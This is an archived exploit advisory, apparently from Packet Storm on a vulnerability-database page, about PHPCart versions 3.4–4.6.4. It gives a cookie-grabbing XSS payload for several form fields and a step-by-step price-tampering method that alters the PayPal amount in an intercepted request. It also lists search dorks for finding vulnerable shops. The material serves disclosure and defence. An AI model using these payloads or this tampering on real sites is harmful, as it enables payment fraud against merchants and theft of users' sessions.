Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

phpcart-xss.txt

🗓️ 24 Aug 2008 00:00:00Reported by h4x0rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

Exploits in PHPCart - XSS & Data Manipulatio

Code
`################################################################   
# .___ __ _______ .___ #   
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #   
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #   
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #   
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #   
# \/ \/ \/ #   
# ___________ ______ _ __ #   
# _/ ___\_ __ \_/ __ \ \/ \/ / #   
# \ \___| | \/\ ___/\ / #   
# \___ >__| \___ >\/\_/ #   
# est.2007 \/ \/ forum.darkc0de.com #   
################################################################   
# -d3hydr8 - sinner_01 - baltazar - P47r1ck - C1c4Tr1Z - beenu #   
# -rsauron - letsgorun - K1u - DON - OutLawz - MAGE -JeTFyrE #   
#-r45c4l -Bond #   
################################################################   
#   
# Author: h4x0r   
#   
# Home : www.darkc0de.com   
#   
# Email : [email protected]  
#   
# Share the c0de!   
#   
################################################################   
#   
# Exploit: Multiple exploits (XSS & data manipulation) in PHPCart (PHP ECommerce Shopping Cart System ) v3.4 - 4.6.4   
#   
# Soft.Site: http://phpcart.net/  
#   
#Exploit 1: XSS  
#  
# phpCart is a open source web based php shopping cart system integrate for ecommece website. A user can run the #following script in "quantity" feild as # well as "Add Engraving" feild or any other feild where we can maually #inject the script, to get the current cookies.  
#   
# POC1:- http://www.site.com/phpcart/  
# like <script>alert(document.cookie);</script> int the "quantity" feild as well as "Add Engraving" feild or any #other feild, to get the current cookies.  
#  
# POC2:- http://www.site.com/phpcart/phpcart.php   
# Injection of XSS script "Quantity" feild is gives with the XSS attack.  
#  
# POC3:- http://www.site.com/phpcart/phpcart.php?action=checkout  
# Injection of XSS script in input feild like "Name" "Company" "Address, Include City & Prov/State" gives with the #XSS attack.  
#  
# Live Demo:- http://phpcart.net/demo/phpcart/  
#   
#   
# Exploit 2: Data manipulation   
#  
#DESCRIPTION:   
#A vulnerability in PHPCart, which can be exploited by malicious people to manipulate orders.   
#The problem is that the "price" and "postage" parameters are not properly verified in "phpcart.php". This can be #exploited to   
#change the price of a product being bought by modifying the "price" parameter directly using a intermediate proxy.   
#  
#POC:- http://www.site.com/phpcart/phpcart.php  
#It was discovered that the main process of online merchant payment was based solely on client-side verification.  
#The PHP module (phpcart.php) received the payment amount from the client-side, forwards the amount and sends back   
#the total price to the backend server for further payment process.   
#There was no proper validation mechanism at the backend to validate the data which had been submitted by the PHP module.   
#Potential attackers could tamper the data and modify the total amount.   
#Before the transaction enters the merchant gate way we captured the data using intermediate proxy and the total amount shown as $XX as shown was tampered and changed.  
#  
#POC Example:   
#Extract price of purchase:-  
#ID Description Price Qty. Amount   
#GB1000 Golf Balls - Long Distance 1 $28.95 + $14 shipping charges so total amount is 42.95   
#  
#Intercept before manipulaion:-  
#After the Verification form when the page is redirecting to payment gateway the page is intermediated. The gateway selected is Paypal.  
#  
#User-Agent: Opera/9.26 (Windows NT 5.1; U; en)  
#Host: www.paypal.com  
#Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1#  
#Accept-Language: en-US,en;q=0.9  
#Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1  
#Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0  
#Referer: http://www.phpcart.net/demo/phpcart/phpcart.php  
#Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=VDrukd29DPvnkTqVFUSeG52gR2iAX22piQHagEGhU  
#Cookie2: $Version=1  
#Connection: Keep-Alive, TE  
#TE: deflate, gzip, chunked, identity, trailers  
#Content-Type: application/x-www-form-urlencoded  
#Content-Length: 286  
#  
#cmd=_xclick&upload=1&currency_code=USD&business=sales%40phpcart.net&notify_url=&  
#item_name=Shopping+Cart+Order+-+B17B3A57D&return=&cancel_return=&invoice=B17B3A57D&  
#firstname=xyz&lastname=qdqd&address1=sfsf&address2=sdfsf&city=sdfsf&state=NE&zip=sfsf&rm=2&amount=42.95&handling_cart=18.00  
#   
#Here price=42.95 was tampered and manipulated to 1.95   
#and u can see that the price on the paypal gateway will be 1.95$.  
#  
# Live Demo:- http://phpcart.net/demo/phpcart/  
#   
# Dork:- phpcart/phpcart.php?   
# Dork:- Powered by phpCart  
#  
#  
#  
################################################################ `

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
phpcartxssdata manipulationecommercesecurityexploits
34